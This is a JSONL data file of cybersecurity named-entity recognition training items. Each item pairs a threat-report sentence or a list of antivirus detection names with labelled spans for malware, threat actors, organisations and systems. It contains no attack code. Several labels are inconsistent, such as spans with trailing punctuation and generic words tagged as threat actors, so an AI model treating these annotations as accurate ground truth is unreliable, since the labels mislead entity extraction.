{"text": "A backdoor also known as: W32.BackdoorKasidetAF.Trojan Backdoor/W32.Kasidet.87040 Trojan.Dynamer.20568 Backdoor.W32.Kasidet.tnrA BKDR_NEUTRINO.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Kasidet.J BKDR_NEUTRINO.SM Backdoor.Win32.Kasidet.bgo Trojan.Win32.Kasidet.dpmgpp Worm.Win32.Kasidet.CAK BackDoor.Neutrino.19 Backdoor.Kasidet.Win32.519 BehavesLike.Win32.TrojanShifu.mh Worm.Win32.Kasidet W32/Kasidet.INNN-8495 Backdoor/Kasidet.by TR/Hijacker.ldiu Trojan[Backdoor]/Win32.Kasidet Backdoor:Win32/Kasidet.C Backdoor.Win32.Kasidet.bgo Trojan/Win32.Dynamer.R156738 Backdoor.Kasidet Spyware.PasswordStealer Win32/Kasidet.AB Win32.Backdoor.Kasidet.Phgi Win32/Trojan.cd8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001524", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.Infospy.everjh Trojan.Infospy.13 BehavesLike.Win32.FakeAlert.lh Trojan-Dropper.Win32.Jscrpt W32.Trojan.Emotet TrojanDropper:Win32/Jscrpt.A!bit Trj/CI.A Win32/Trojan.f75", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001525", "source": "cyner2_train"}}
{"text": "He matched both PDB paths as wel as behaviour to these samples, this blog describes the changed made to CryptoApp as well as the active campaign.", "spans": {"MALWARE: CryptoApp": [[104, 113]], "THREAT_ACTOR: the active campaign.": [[125, 145]]}, "info": {"id": "cyner2_train_001532", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Tepfer Trojan-PSW.Win32.Tepfer.psxgjz Troj.Psw.W32.Tepfer!c Trojan.MSIL.Crypt TR/Dropper.MSIL.273998 Trojan-PSW.Win32.Tepfer.psxgjz Trojan:Win32/Matta.A!gfc TrojanPSW.Tepfer Trj/GdSda.A Win32.Trojan.Falsesign.Agbe MSIL/Injector.ONL!tr Win32/Trojan.Dropper.28b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001533", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PowerShell/Rozena.AF BehavesLike.Win64.Dropper.cc Trojan/Scar.bmid", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001534", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.RSM.2.0 Backdoor/W32.RSM.204800 Backdoor.RSM Backdoor.RSM.2.0 Backdoor.RSM.2.0 Backdoor.Trojan Backdoor.RSM.2.0 Backdoor.Win32.RSM.20 Backdoor.RSM.2.0 Trojan.Win32.RSM.dmmg Backdoor.Win32.Z.Rsm.204800 Backdoor.W32.RSM.20!c Backdoor.RSM.2.0 Backdoor.RSM.2.0 BackDoor.RMS.20 Backdoor.RSM.Win32.4 BehavesLike.Win32.Dropper.dc Backdoor.Win32.Intruder W32/Risk.WUUC-5425 Backdoor/RSM.28.b BDS/RSM.20.2 Backdoor:Win32/RSM.2_0 Backdoor.Win32.RSM.20 Backdoor.RSM Win32/RSM.20 Win32.Backdoor.Rsm.Sysb Backdoor.RSM!gcfh+QxIfXE W32/RSM.20!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001535", "source": "cyner2_train"}}
{"text": "Security researchers have discovered that Cl0p is now targeting Linux systems, using a new variant specifically designed for this operating system.", "spans": {"ORGANIZATION: Security researchers": [[0, 20]], "MALWARE: Cl0p": [[42, 46]], "SYSTEM: Linux systems,": [[64, 78]], "MALWARE: new variant": [[87, 98]], "SYSTEM: operating system.": [[130, 147]]}, "info": {"id": "cyner2_train_001536", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 Worm.BAT.Autorun.ex TrojWare.Win32.StartPage.~AO Win32.HLLW.Autoruner2.11336 Worm.AutoRun.Win32.42154 BehavesLike.Win32.Virus.cz Trojan-Dropper.Win32.Autorun Worm.BAT.al Win32.HeurC.KVM007.a.kcloud Worm.BAT.Autorun.ex TrojanDropper:Win32/Autorun.AC Worm/Win32.AutoRun.R74164 TScope.Trojan.Delf Trj/CI.A BAT/Autorun.BK Bat.Worm.Autorun.Aihw BAT/Autorun.EX!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001537", "source": "cyner2_train"}}
{"text": "Nonetheless, we can obtain targeting information and insight into tactics from the spearphish messages used by the threat actors.", "spans": {"THREAT_ACTOR: threat actors.": [[115, 129]]}, "info": {"id": "cyner2_train_001539", "source": "cyner2_train"}}
{"text": "A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team and eventually download PoisonIvy and other payloads in user systems.", "spans": {"THREAT_ACTOR: campaign": [[9, 17]], "VULNERABILITY: Flash exploits": [[68, 82]], "ORGANIZATION: Hacking Team": [[94, 106]], "MALWARE: PoisonIvy": [[131, 140]], "MALWARE: payloads": [[151, 159]], "SYSTEM: user systems.": [[163, 176]]}, "info": {"id": "cyner2_train_001542", "source": "cyner2_train"}}
{"text": "This trojanized version of PuTTY harvests credentials and relays the information back to a collection server in the same way too.", "spans": {"MALWARE: trojanized version of PuTTY": [[5, 32]]}, "info": {"id": "cyner2_train_001543", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SysAntiH.Worm Worm.Win32.AutoRun!O Worm.Yeltminky.A2 Win32.Trojan.KillAV.y W32.SillyFDC Win32/SillyAutorun.BBA Trojan.Win32.AntiAV.ciuz Trojan.Win32.AutoRun.btmkp Worm.Win32.Autorun.70144.E Trojan.Win32.KillAV.tco Win32.HLLW.Autoruner.25125 BehavesLike.Win32.Backdoor.lc Trojan-PWS.Win32.Lmir Worm/AutoRun.inq Virus/Win32.Virut.ce Worm:Win32/Yeltminky.A Trojan.Win32.AntiAV.ciuz Trojan/Win32.Hupigon.C73726 MalwareScope.Trojan-PSW.Game.7 RiskWare.Tool.CK Worm.AutoRun!snJYP2M4Pvg W32/QQPass.BTC Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001545", "source": "cyner2_train"}}
{"text": "Ransomware has been responsible for many millions of dollars in damages, and CryptoWall is one of the most lucrative ransomware families in use today.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: CryptoWall": [[77, 87]], "MALWARE: ransomware families": [[117, 136]]}, "info": {"id": "cyner2_train_001548", "source": "cyner2_train"}}
{"text": "In March 2017, FireEye observed both nation state and financially motivated actors using EPS zero day exploits assigned as CVE-2017-0261 and CVE-2017-0262, prior to Microsoft disabling EPS rendering in its Office products with an update in April 2017.", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "THREAT_ACTOR: nation state": [[37, 49]], "THREAT_ACTOR: financially motivated actors": [[54, 82]], "SYSTEM: EPS": [[89, 92], [185, 188]], "VULNERABILITY: zero day exploits": [[93, 110]], "ORGANIZATION: Microsoft": [[165, 174]], "SYSTEM: Office products": [[206, 221]]}, "info": {"id": "cyner2_train_001551", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Coantor.11 Win.Trojan.Cuegoe-6336261-0 BehavesLike.Win32.Dropper.vc Trojan:Win32/Salgorea.C!dha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001552", "source": "cyner2_train"}}
{"text": "In a story which reminds us of the Bangladesh Bank case – the culprits had compromised the bank's system connected to the SWIFT network and used this to perform the transfers.", "spans": {"ORGANIZATION: the Bangladesh Bank": [[31, 50]], "THREAT_ACTOR: culprits": [[62, 70]], "SYSTEM: the bank's system": [[87, 104]], "SYSTEM: the SWIFT network": [[118, 135]]}, "info": {"id": "cyner2_train_001554", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodcaf.Trojan.0256 Worm/W32.Opanki.176640 W32.Allim W32/Funmov.a Win32.Trojan.WisdomEyes.151026.9950.9984 W32.Allim Win32/Opanki.R WORM_OPANKI.Q Backdoor.Win32.Aimbot.d Trojan.Win32.Aimbot.fujn Win32.Backdoor.Aimbot.Syse Worm.Win32.Opanki.R BackDoor.Oscar Worm.Opanki.Win32.38 WORM_OPANKI.Q BehavesLike.Win32.Sdbot.cc W32/Risk.ZUMS-8015 I-Worm/Opanki.b W32/Opanki.A1D5!worm Trojan[Backdoor]/Win32.Aimbot Backdoor.W32.Aimbot.d!c Win32/Funmov.worm.176640 Worm:Win32/Funmov.A Win32/Trykid.Y W32/Opanki.worm W32.Allim Bck/Sdbot.JED.worm Worm.Funmov!UUJQui2L6no Backdoor.Win32.Aimbot Worm/Opanki.N Backdoor.Win32.Aimbot.aLdg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001556", "source": "cyner2_train"}}
{"text": "During the past few weeks, we have received information about a new campaign of targeted ransomware attacks.", "spans": {"THREAT_ACTOR: campaign": [[68, 76]]}, "info": {"id": "cyner2_train_001557", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoA.DAEE W32.Virut.G W32.Virut.CF Trojan.Win32.Crypt.dzf Virus.Win32.Virut.CE BehavesLike.Win32.BadFile.pt W32/Trojan.UBPC-4784 Trojan.Crypt.cm Trojan/Win32.Crypt TrojanDownloader:Win32/Dothemt.A Trojan.Win32.Crypt.dzf Trojan.Crypt W32/Sality.AO Win32/Virut.NBP Virus.Win32.Virut.ug W32/Virut.CE Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001558", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9962 Trojan.Win32.Graftor.dcgcrd TrojWare.Win32.Kryptik.~NT Trojan-Downloader.Win32.Banload Trojan:Win32/BrobanAda.A TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001562", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.BadApp!O TrojanDownloader.Small.AGT4 PWS-Mmorpg.e TSPY_RUNAE.SM Infostealer.Gampass Win32/AdClicker.DZX Win.Trojan.Toopu-1 Trojan.Win32.Dwn.bxzwi Backdoor.Win32.A.Rbot.65536 TrojWare.Win32.TrojanDownloader.Nirava.~clj Trojan.DownLoader1.38650 Adware.FloodAd.Win32.2 PWS-Mmorpg.e Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanClicker:Win32/Runae.A Trojan/Win32.OnlineGameHack.R1804 Adware.FloodAd Win32/Adware.FloodAd.AA Trojan.Win32.Clicker.sa W32/FLOODAD.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001566", "source": "cyner2_train"}}
{"text": "These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions.", "spans": {}, "info": {"id": "cyner2_train_001567", "source": "cyner2_train"}}
{"text": "One of Strider's targets had also previously been infected by Regin.", "spans": {"MALWARE: Strider's": [[7, 16]], "MALWARE: Regin.": [[62, 68]]}, "info": {"id": "cyner2_train_001568", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dyname TROJ_WOONIKY.B TROJ_WOONIKY.B W32/Trojan.TZVR-6635 TR/Kazy.196035.1 Trojan.MSIL.Krypt.2 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001569", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.KowinPC.Worm Win32.Trojan.WisdomEyes.16070401.9500.9820 W32.Kaxela.A Win32/Pipown.KJ Win.Worm.Autorun-2398 Worm.Win32.AutoRun.zt Trojan.Win32.ARSleep.gcbz W32.W.AutoRun.yo!c TrojWare.Win32.Magania.~L Trojan.Popwin.651 Worm.AutoRun.Win32.11126 BehavesLike.Win32.Dropper.lc Trojan/DiskAutorun.px BDS/Exaal.45056 Worm/Win32.AutoRun Win32.Troj.OnlineGames.w.kcloud Trojan.Win32.Autorun.21043 Worm.Win32.AutoRun.zt Trojan:Win32/Malamiko.A Worm.AutoRun Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001572", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.SdBoter.28496 I-Worm.SdBoter.r2 Worm.SdBoter!97XSxLq3xLE W32/Sdbot.GFWC-1787 Win32/SdBoter.J WORM_SDBOTER.J Worm.W32.SdBoter.J Net-Worm.Win32.SdBoter.j Trojan.Win32.SdBoter.oxfz W32.W.SdBoter.j!c Win32.Worm-net.Sdboter.Star Worm.Win32.SdBoter.J BackDoor.IRC.Sdbot Worm.SdBoter.Win32.7 WORM_SDBOTER.J BehavesLike.Win32.Worm.mc W32/Sdbot.DMQ WORM/NetBot.A.2 W32/KWBOT.H Worm[Net]/Win32.SdBoter Win32/IRCBot.worm.28496 Worm:Win32/Sdboter.J W32/Sdbot.XT.worm Net-Worm.Win32.SdBoter.I IRC/BackDoor.SdBot.24.AC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001573", "source": "cyner2_train"}}
{"text": "During our investigation we found several backdoors that the HDRoot bootkit used for infecting operating systems.", "spans": {"MALWARE: backdoors": [[42, 51]], "MALWARE: HDRoot bootkit": [[61, 75]], "SYSTEM: operating systems.": [[95, 113]]}, "info": {"id": "cyner2_train_001574", "source": "cyner2_train"}}
{"text": "One of the top targets is the Japan Pension Service, but the list of targeted industries includes government and government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and so on.", "spans": {"ORGANIZATION: Japan Pension Service,": [[30, 52]], "ORGANIZATION: industries": [[78, 88]], "ORGANIZATION: government": [[98, 108]], "ORGANIZATION: government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation": [[113, 428]]}, "info": {"id": "cyner2_train_001576", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Email-Flooder.Win32.DaMailer!O Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Damailer-4 Email-Flooder.Win32.DaMailer.119 TrojWare.Win32.Flooder.DarkMail Flooder.Damail Tool.DaMailer.Win32.2 BehavesLike.Win32.BadFile.th Email-Flooder.DaMailer.d Email-Flooder.Win32.DaMailer.119 Trojan/Win32.HDC.C123509 EmailFlooder.DaMailer Trj/CI.A Win32/Flooder.DarkMail Win32.Trojan.Damailer.Htwm Flooder.DaMailer!LiHdaVOdIDQ Email-Flooder.Win32.DaMailer", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001579", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Hamer.B!utility Trojan-Dropper/W32.Hamer_Packed.700928 Dropper.Hamer.Win32.41 Trojan/Dropper.Hamer.20 Trojan.DR.Hammer!WTBuq6wvib0 W32/Hamer.B@tool Backdoor.Beasty.Family Win32/TrojanDropper.Hamer.20 TROJ_HAMER.R Trojan.Downloader.Small-12 Trojan-Dropper.Win32.Hamer.20 Trojan.Win32.Hamer.dztpdb Dropper.A.Hamer.700928[h] Troj.Dropper.W32.Hamer.20!c TrojWare.Win32.TrojanDropper.Hamer.20 Trojan.DownLoader.225 Backdoor.Beasty.Family TROJ_HAMER.R BehavesLike.Win32.Dropper.jc W32/Hamer.PMZI-8206 TrojanDropper.Hammer.20 TR/Drop.Hamer.20 W32/Hamer.20!tr Trojan[Dropper]/Win32.Hamer Dropper/Hamer.700928 Backdoor.Beasty.Family TrojanDropper.Hamer Trojan.Win32.Dropper.20 Win32.Trojan-dropper.Hamer.Pkra Trojan-Dropper.Win32.Delf Dropper.Hamer.B Win32/Trojan.ece", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001580", "source": "cyner2_train"}}
{"text": "We covered this attack in detail in our blog titled Shamoon 2: Return of the Disttrack Wiper, which targeted a single organization in Saudi Arabia and was set to wipe systems on November 17, 2016.", "spans": {"MALWARE: Shamoon": [[52, 59]], "MALWARE: Disttrack Wiper,": [[77, 93]], "ORGANIZATION: single organization": [[111, 130]]}, "info": {"id": "cyner2_train_001585", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Zombam!O Win32.Backdoor.Zombam.b W32/Zombam.BWLR-3283 Backdoor.Zombam.B Win.Trojan.Small-4082 Backdoor.Win32.Zombam.m Trojan.Win32.Zombam.mpym Backdoor.Win32.Zombam.M BackDoor.Httprat.2 Backdoor.Zombam.Win32.32 BehavesLike.Win32.Rontokbro.nc Backdoor.Win32.Zombam.m W32/Zombam.N@bd Backdoor/Zombam.m BDS/Zombam.L.1 Trojan[Backdoor]/Win32.Zombam Backdoor:Win32/Zombam.L Backdoor.Win32.Zombam.31444 Backdoor.Win32.Zombam.m Backdoor.Zombam Win32/Zombam.M Backdoor.Zombam!rqjS+1zkQfU W32/Zombam.M!tr.bdr Win32/Backdoor.009", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001586", "source": "cyner2_train"}}
{"text": "In this case, though, running the troubleshooter leads to the installation of LatentBot, a well-documented modular bot used for surveillance, information stealing, and remote access.", "spans": {"SYSTEM: troubleshooter": [[34, 48]], "MALWARE: LatentBot,": [[78, 88]], "MALWARE: bot": [[115, 118]]}, "info": {"id": "cyner2_train_001588", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9705 Trojan.Win32.SchoolBoy.bhk Troj.Banker.W32.Qadars.mtwx Win32.Trojan.Schoolboy.Hvtb Trojan.MulDrop4.3547 BehavesLike.Win32.RAHack.nc Trojan.Heur.GM.D439A5C Trojan.Win32.SchoolBoy.bhk Trojan.Win32.PSW W32/SchoolBoy.BHK!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001589", "source": "cyner2_train"}}
{"text": "Bookworm's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42.", "spans": {"MALWARE: Bookworm's": [[0, 10]], "MALWARE: PlugX": [[55, 60]], "SYSTEM: architecture": [[93, 105]], "ORGANIZATION: Unit 42.": [[144, 152]]}, "info": {"id": "cyner2_train_001590", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9973 Backdoor.Truebot Win.Trojan.Silence-6367671-0 W32/Trojan.JFGA-0175 Backdoor:Win32/Truebot.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001591", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Antilam.gzgw Backdoor.Trojan Antilam.FE BKDR_ANTILAM.A Backdoor.Win32.Antilam.20.b Backdoor.Antilam!vJ4jD43D2/o NORMAL:Trojan.SERVER_3!27802 Backdoor.Win32.Antilam.dfer BackDoor.AntiLame.23 BKDR_ANTILAM.A BehavesLike.Win32.Backdoor.cc W32/Risk.BTKH-4955 Backdoor/Antilam.20.ao BDS/Antilam.20.C Trojan[Backdoor]/Win32.Antilam Backdoor:Win32/Antilam.20.B Trojan/Win32.Xema Backdoor.AntiLamer Win32/Antilam.20.B Backdoor.Win32.Antilam W32/Antilam.B!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001592", "source": "cyner2_train"}}
{"text": "FortiGuard Labs decided to analyze some of them, and in this report, I will discuss its evolution over the past 10 months.", "spans": {"ORGANIZATION: FortiGuard Labs": [[0, 15]]}, "info": {"id": "cyner2_train_001594", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Exploit.ShellCode.a Trojan.Mdropper.C TROJ_SAMSA.H Trojan-Dropper.MSWord.1Table.ai Exploit.OleMacroPrj.CVE-2003-0347.cezzve DOC.Z.CVE-2003-0347.75864 Win32.Trojan-Dropper.1table.swy BackDoor.Mask TROJ_SAMSA.H Troj.Dropper.Msword!c Trojan-Dropper.MSWord.1Table.ai Trojan-Dropper.MSWord.1Table.ai possible-Threat.Embedded.ExeInOffice", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001595", "source": "cyner2_train"}}
{"text": "The cyberattacks against the Ukrainian electric power industry continue.", "spans": {"ORGANIZATION: the Ukrainian electric power industry": [[25, 62]]}, "info": {"id": "cyner2_train_001597", "source": "cyner2_train"}}
{"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services IRIS team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: IBM X-Force Incident Response": [[21, 50]], "ORGANIZATION: Intelligence Services IRIS team": [[55, 86]], "THREAT_ACTOR: a threat actor": [[134, 148]], "MALWARE: Shamoon malware": [[168, 183]], "ORGANIZATION: organizations.": [[211, 225]]}, "info": {"id": "cyner2_train_001598", "source": "cyner2_train"}}
{"text": "We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.", "spans": {"MALWARE: ransomware variants": [[43, 62]], "MALWARE: MarsJoke.": [[102, 111]]}, "info": {"id": "cyner2_train_001600", "source": "cyner2_train"}}
{"text": "It has a very low volume in this two-year period, totaling roughly 27 total samples.", "spans": {"MALWARE: samples.": [[76, 84]]}, "info": {"id": "cyner2_train_001602", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Scar!O Trojan.Scar Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Scar.bwre Trojan.Win32.VB.etyztu Trojan.Win32.Z.Scar.3042496 Troj.Downloader.W32.VB.l4ji Trojan.DownLoader25.47210 Trojan.Scar.Win32.27021 BehavesLike.Win32.Autorun.vm Trojan.Heur.VB.EDB7EC Trojan.Win32.Scar.bwre Worm:Win32/Sowndegg.B Trojan/Win32.VB.C16539 Trojan.Scar Trj/CI.A Win32/VB.SNU Win32.Trojan.Scar.Pgcp Trojan.Scar!yxP8tXFqxTQ Trojan-Downloader.Win32.VB W32/VB.SNU!tr Win32/Trojan.1c6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001603", "source": "cyner2_train"}}
{"text": "The objective of this blog is to highlight some of the capabilities of this new RAT family and the impact seen so far.", "spans": {"MALWARE: RAT family": [[80, 90]]}, "info": {"id": "cyner2_train_001604", "source": "cyner2_train"}}
{"text": "Since mid-2014, the Kudelski Security Cyber Fusion Center has been monitoring and investigating Sphinx Moth.", "spans": {"ORGANIZATION: Kudelski Security Cyber Fusion Center": [[20, 57]], "THREAT_ACTOR: Sphinx Moth.": [[96, 108]]}, "info": {"id": "cyner2_train_001606", "source": "cyner2_train"}}
{"text": "Espionage and Asymmetric Operation Targeting", "spans": {"THREAT_ACTOR: Espionage": [[0, 9]], "THREAT_ACTOR: Asymmetric Operation Targeting": [[14, 44]]}, "info": {"id": "cyner2_train_001608", "source": "cyner2_train"}}
{"text": "SWC campaign impacted global aerospace, government, and technology organizations Uses .via extension", "spans": {"THREAT_ACTOR: SWC campaign": [[0, 12]], "ORGANIZATION: global aerospace, government,": [[22, 51]], "ORGANIZATION: technology organizations": [[56, 80]]}, "info": {"id": "cyner2_train_001609", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.17AD Trojan/W32.KRDDoS.950784 TROJ_DIDKR.A Win32.Trojan.WisdomEyes.16070401.9500.9770 Downloader.Castov TROJ_DIDKR.A Trojan.DownLoader9.34810 trojan.win32.miuref.c BehavesLike.Win32.Miuref.dc Trojan.Spy TR/Spy.950784.12 W32/KRDNSDDoS.A!tr TrojanDownloader:Win32/Simkor.A Win-Trojan/Ddkr.950784 Trj/CI.A Win32.Trojan.Spy.Hrpb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001611", "source": "cyner2_train"}}
{"text": "The Trojan named Linux.PNScan.1 can infect devices with ARM, MIPS, or PowerPC architectures.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: ARM, MIPS,": [[56, 66]], "SYSTEM: PowerPC architectures.": [[70, 92]]}, "info": {"id": "cyner2_train_001613", "source": "cyner2_train"}}
{"text": "We have investigated the malware to identify how it spreads, the techniques it uses and its impact.", "spans": {}, "info": {"id": "cyner2_train_001614", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.R2D2!O Backdoor.R2d2 Backdoor.R2D2 BKDR_R2D2.SMR Backdoor.Win32.R2D2.a Trojan.Win32.R2D2.esyktw Backdoor.Win32.R2D2.360448[UPX] Backdoor.W32.R2D2!c Backdoor.Win32.R2D2.~B1 BackDoor.RTwoDTwo.1 BKDR_R2D2.SMR BehavesLike.Win32.Fake.cc Backdoor.Win32.R2D2 Backdoor/R2D2.b TR/GruenFink.1 Backdoor.Win32.R2D2.a Backdoor:Win32/R2d2.A Trj/Bundestrojaner.A Win32/R2D2.A Win32.Backdoor.R2d2.Sudy Backdoor.R2D2!w/vENfl9bd8 W32/R2D2.A!tr.bdr Win32/Trojan.fd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001616", "source": "cyner2_train"}}
{"text": "The name Carbanak comes from Carberp, a banking Trojan whose source code was leaked, and Anunak, a custom Trojan that has evolved over the years.", "spans": {"MALWARE: Carbanak": [[9, 17]], "MALWARE: Carberp,": [[29, 37]], "MALWARE: banking Trojan": [[40, 54]], "MALWARE: source code": [[61, 72]], "MALWARE: Anunak,": [[89, 96]], "MALWARE: custom Trojan": [[99, 112]]}, "info": {"id": "cyner2_train_001617", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OverlayUPXDPM.PE W32.Lamer.FG8 PE_SILLY.T Win32.Virus.Lamer.f W32/SillyP2P.BO W32.SillyP2P Win32/Xolxo.A PE_SILLY.T Win.Worm.Delf-13898 Virus.Win32.Lamer.fg Trojan.Win32.Delf.oxkq Win32.BagarBubba.A W32.W.AutoRun.kYNN TrojWare.Win32.Pincav.AV Win32.HLLP.Bagar Worm.Delf.Win32.340 BehavesLike.Win32.Fesber.tm W32/Delf.aj W32/P2P_Worm.WULF-7526 Worm/Delf.vm Worm:Win32/Xolxo.A Virus.Win32.Lamer.fg W32/HLLP.11042 Worm.Delf Win32/Delf.NAY Virus.Win32.Lamer.fg Worm.SillyP2P!Dqe8+ZFutPA P2P-Worm.Win32.Delf.aj Virus.Win32.Viking.LG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001618", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Shutit.A Trojandownloader.Shutit Trojan.Downloader.Shutit.A Downloader.Shutit.Win32.4 Troj.Downloader.W32.Shutit.10!c Trojan/Downloader.Shutit.10 Trojan.Downloader.Shutit.A Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.EKPI-0804 Win32/DlShut.A TROJ_SHUTIT.10.A Win.Trojan.Revell-1 Trojan.Downloader.Shutit.A Trojan-Downloader.Win32.Shutit.10 Trojan.Downloader.Shutit.A Trojan.Win32.Shutit.vmoy Trojan.Downloader.Shutit.A Trojan.Aphex.10 TROJ_SHUTIT.10.A BehavesLike.Win32.Downloader.zt Trojan-Downloader.Win32.Aphex TrojanDownloader.Shutit.10 TR/Shutit.10.A Trojan[Downloader]/Win32.Shutit Win32.Troj.Downloader.b.kcloud TrojanDownloader:Win32/Shutit.1_0 Trojan-Downloader.Win32.Shutit.10 TrojanDownloader.Shutit Trj/Dwn.Shutit.10 Win32/TrojanDownloader.Shutit.10 Win32.Trojan-downloader.Shutit.Ahxq Trojan.DL.Small!IxJNSrLVynM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001619", "source": "cyner2_train"}}
{"text": "However, Bookworm expands on its capabilities through its ability to load additional modules directly from its command and control C2 server.", "spans": {"MALWARE: Bookworm": [[9, 17]]}, "info": {"id": "cyner2_train_001620", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeMS Trojan.Win32.XPACK.bdmoql WS.Reputation.1 W32/Swisyn.CB Packed.Win32.Cryptcf.A Trojan.DownLoader7.26386 Packed.Multi.dlw Win32.Hack.Packed.f.kcloud Backdoor:Win32/Racdr.A BScope.Trojan.SvcHorse.01643 Backdoor.Win32.BlackHole W32/Multi.E!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001621", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS:Trojan.JS.Likejack.A JS.Faceliker.NC JS/Faceliker.a JS/Faceliker.A!Eldorado JS:Trojan.JS.Likejack.A JS:Trojan.JS.Likejack.A TrojWare.JS.TrojanClicker.FbLiker.A JS:Trojan.JS.Likejack.A JS/Faceliker.a JS/Faceliker.A!Eldorado JS/FBJack.I!tr JS:Trojan.JS.Likejack.A TrojanClicker:JS/Faceliker.S Trojan-Clicker.JS.Faceliker Script.Trojan.JSClicker.A trojan.js.likejack.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001623", "source": "cyner2_train"}}
{"text": "The report details how many seemingly unrelated cyber attacks may, in fact, be part of a broader offensive fueled by a shared development and logistics infrastructure — a finding that suggests some targets are facing a more organized menace than they realize.", "spans": {"SYSTEM: logistics infrastructure": [[142, 166]]}, "info": {"id": "cyner2_train_001624", "source": "cyner2_train"}}
